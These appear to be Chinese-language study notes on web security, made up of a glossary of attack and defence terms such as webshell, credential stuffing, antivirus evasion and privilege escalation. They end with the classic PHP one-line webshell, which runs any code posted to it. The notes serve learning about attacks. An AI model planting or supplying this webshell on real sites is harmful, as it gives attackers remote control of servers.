安全细分领域
Web 漏洞分类
术语
肉鸡:黑客攻击下的主机,可用于对目标站点发起 DDOS 攻击。病毒:可以对目标主机造成破坏的文件。蠕虫:会在目标主机中自动传播到的病毒。木马:黑客用于远程控制目标主机的文件。webshell:用于控制目标主机的工具,通常具有多种控制功能。拖库:黑客将目标的整个数据库的数据下载下来的行为。撞库:黑客拖库成功后,利用数据库中的账号密码尝试去登录其他站点的行为。社会工程学:利用人性的心里,以欺骗的方式达到黑客的目的。免杀:防止目标主机中的杀毒软件将黑客上传的危险文件删除的技术。提权:黑客为了获取目标主机中更多的执行权限,将目标主机权限提升为管理员/系统权限的行为。蜜罐:用于欺骗黑客的一个陷阱网站。WAF:Web应用防火墙,用于防止黑客在网页中提交恶意的请求的软件。0Day:未被公开的漏洞,通常只存在于少部分人手上。脚本小子:擅长利用工具达到目的的人,通常不懂技术的原理。CTF:网络安全领域中的一种比赛。旁站:同一台主机中部署的不同站点,通常攻破一个旁站就能获得该台主机中所有站点的权限。C 段:统一个 C 网段的所有主机。子域名:一个主域名中可以扩展为多个子域名,如:主域名 qq.com 子域名 y.qq.com v.qq.com探针:可以查看到目标主机各种配置信息或状态的工具。指纹:目标主机再向外提供服务时留下的服务痕迹。黑盒:再未知目标系统内部构造机制的条件下对其进行攻击。白盒:再已知目标系统内部构造机制的条件下对其进行攻击。
木马
PHP一句话木马
<?php @eval($_POST['cmd']);?>
